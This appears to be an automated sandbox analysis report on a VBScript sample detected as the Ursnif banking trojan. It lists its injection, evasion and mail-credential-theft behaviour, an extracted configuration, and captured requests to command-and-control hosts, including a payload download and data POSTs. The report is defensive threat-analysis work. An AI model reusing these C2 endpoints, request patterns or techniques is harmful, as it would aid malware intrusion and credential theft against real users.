Analysis Report 6znkPyTAVN7V.vbs

Overview

General Information

Sample Name:	6znkPyTAVN7V.vbs
Analysis ID:	321068
MD5:	a5f063ac8cf23a274922a337a8eeac2c
SHA1:	bfae866c96996f9d26ec356ea2b48caa8e2b64d7
SHA256:	2dd9418ae38f181b5901be316cbb0deaa2205b2865a3c391105966b7d48fae2f
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Creates processes via WMI

Deletes itself after installation

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file access)

Uses nslookup.exe to query domains

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\earmark.avchd

Avira: detection malicious, Label: TR/Crypt.XDR.Gen

Found malware configuration

Source: explorer.exe.3440.31.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25*", "version": "250157", "uptime": "250", "system": "71d3df7c602bda1335102fc2c9a1d3ef", "crc": "3d255", "action": "00000001", "id": "2200", "time": "1605897760", "user": "3d11f4f58695dc15e71ab15cfb0b75a9", "soft": "1"}

Multi AV Scanner detection for domain / URL

Source: c56.lepini.at	Virustotal: Detection: 12%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\earmark.avchd

ReversingLabs: Detection: 45%

Multi AV Scanner detection for submitted file

Source: 6znkPyTAVN7V.vbs

Virustotal: Detection: 13%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\earmark.avchd

Joe Sandbox ML: detected

Source: C:\Windows\explorer.exe	Code function: 31_2_04DE37B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,		31_2_04DE37B8
Source: C:\Windows\explorer.exe	Code function: 31_2_04E091A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,		31_2_04E091A0

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Networking:

Found Tor onion address

Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Uses nslookup.exe to query domains

Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: global traffic	HTTP traffic detected: GET /api1/_2B3RKwW/iUs9mOE_2Fy587oYC_2FhiP/cqwrXVzOiN/3iy_2FEQhtiU4caUY/vWPEHIJ26Cxh/hxAwM2tWDkS/qSV4R5vbQ5WIYO/vg5dj3B7tqHn_2B5lMt8g/ZCmUbWqqhg2tfb6o/oSVPWNxkppLXqHK/vV8NxeiuEcG4zeTrzv/QP7ToNFgg/ooAdhPJGl1OBQCmkIaFe/emmxLHFFXg9hJQ1rXN3/R0lYYQ4mDPy013_2BEN29K/KCxOU_2Fu7g0U/2_2FUAD4/FmM_2B3LZkNPjT_0A_0Duh_/2Fckmk1sZB/GylmdmeslwIeJNcsI/5j5juAVhdr/efpdipqa/_2B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/V1DBpeXcd2SVjySIO/8hTgDrr844Y9/FkNwDrqNmFQ/9oPqk4MIOokEEO/lAj4retEL8hBWD_2B0pxU/T7oLkBnwilwgrQ1C/AvHVEHenvUSVrMm/ORNvMXPydgnOdjqkcE/7xobo7HTI/u73jkfr_2FjHMJCI9rY_/2BjBbFYZ7F0eTv_2F_2/BYfIj0Dy67ek7AsPxEOFXL/T0hfdBRqc_2Fe/6YdiM0Di/NVBY3QI9vCDaT6RZ7Z_2Bsp/Tf56xI5YR0/r4h0IdnvWama32P8r/O_0A_0DQ7_2F/xwdj748yuth/QipPLmYlZrUIFf/ItsP98kSmplqzXo_2FbHs/x1amFzzsXuM/2v_2FCbB0Kb/f HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/QdpN8R1Zxydo1sWwz/dLDbxLZDRc0K/NqGQWShgOQF/J_2BAL2WZ8_2BO/wleDsz6XPtrejMXvExKU_/2B47KheFhTVz6OHb/U8BHNRse2TRbQUl/t4VunRcZuRVr1P5Yn8/vdcf8SUP6/tiGlFE6jFupRpiPfDk7q/1tiJD_2B3O0KnOAOHpk/hj_2B_2BJ_2FTygogOh927/rHfuAtp29MX7x/A_2B0dM4/eZkJa3YiO8U7UX1dLO9738r/QF_2FAV_2B/2P7sELH5zi9v_2FVk/N6T6tg_2Fhv_/0A_0DGou2O0/txLMOZmvcHnBqh/tXlcbpB0l_2B98Y5d82fD/5OpvYLLEKf7MUfb_/2BVb4feXqkslzZ/1 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/MGm_2BawPNnqv/qfARarLc/23L5WAJpq6aA5FcNoQawOw8/WY2g8fAdL6/NUu66E7OS0R_2BG57/OXAVzJZbFn8X/_2FSC9D9K6b/AbdxtvT02SkSw7/ZkCvirGXx0HM0tRJhZYZ_/2FwisZmcZhXU6gZ7/74WQUBqLJvkFLgc/o4J6CeVWx8F4FYZhHJ/7gzbcqiqM/JXYzTaXO4suSoccFx6OR/YQyFoZyErkPp2TAfMD9/L602sCubGMEbypmf_2BGCc/ZHk9_2FkS_2BQ/fsEW1_0A/_0DfIoRZGv1JHMAUdavz6FH/UJEF6aAPh1/TyQo1G51CZuwSA_/2B4G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at

Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

HTTP traffic detected: POST /api1/2tB6HzcKS8r0WW7BAax/EpXwH5CwuRnFdJmKi5Wb0z/8L2XyFmuUk21U/q489sLw0/eYa15UFemmR_2B7v06lu5vZ/vv8LbddAYj/XqNowlO_2BXAYCqjQ/aD8hcjl_2FOt/pSFCqIQQoj_/2FMnv2bRbnt_2B/gat5l9a8xt_2BSKi_2BnF/Ycvl8NwzPykoI_2B/tPDx3U6gMTBe2j_/2B5pUjMJEk5uJWfdSo/hcLd6nUAU/DHphb1AEsxwfEaYhnZ7Z/1mtzQBAzvGMymAdx_2B/RxMGg_0A_0DDuMMHm1mDrd/9OXCQyyxJSC5W/eaK7kK7AE/tmjaexqRZ7OBc/X HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Nov 2020 09:41:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 0000001F.00000000.545744038.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001F.00000000.550538266.000000000D473000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/V1DBpeXcd2SVjySIO/8hTgDrr844Y9/FkNwDrqNmFQ/9oPqk4MIOokEEO/lAj4retEL8hBWD
Source: explorer.exe, 0000001F.00000000.547816387.0000000008455000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/_2B3RKwW/iUs9mOE_2Fy587oYC_2FhiP/cqwrXVzOiN/3iy_2FEQhtiU4caUY/vWPEHIJ26C
Source: explorer.exe, 0000001F.00000000.548344844.000000000854C000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/2tB6HzcKS8r0WW7BAax/EpXwH5CwuRnFdJmKi5Wb0z/8L2XyFmuUk21U/q489sLw0/eYa15UF
Source: explorer.exe, 0000001F.00000000.548344844.000000000854C000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/MGm_2BawPNnqv/qfARarLc/23L5WAJpq6aA5FcNoQawOw8/WY2g8fAdL6/NUu66E7OS0R_2BG
Source: explorer.exe, 0000001F.00000000.548486561.0000000008626000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at:80
Source: explorer.exe, 0000001F.00000000.547816387.0000000008455000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at:80/api1/2tB6HzcKS8r0WW7BAax/EpXwH5CwuRnFdJmKi5Wb0z/8L2XyFmuUk21U/q489sLw0/eYa1
Source: explorer.exe, 0000001F.00000000.548239180.000000000851A000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at:80/api1/MGm_2BawPNnqv/qfARarLc/23L5WAJpq6aA5FcNoQawOw8/WY2g8fAdL6/NUu66E7OS0R_
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001F.00000000.545744038.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, control.exe, 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000016.00000003.463966889.00000265013EA000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000016.00000002.511106004.0000026500001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
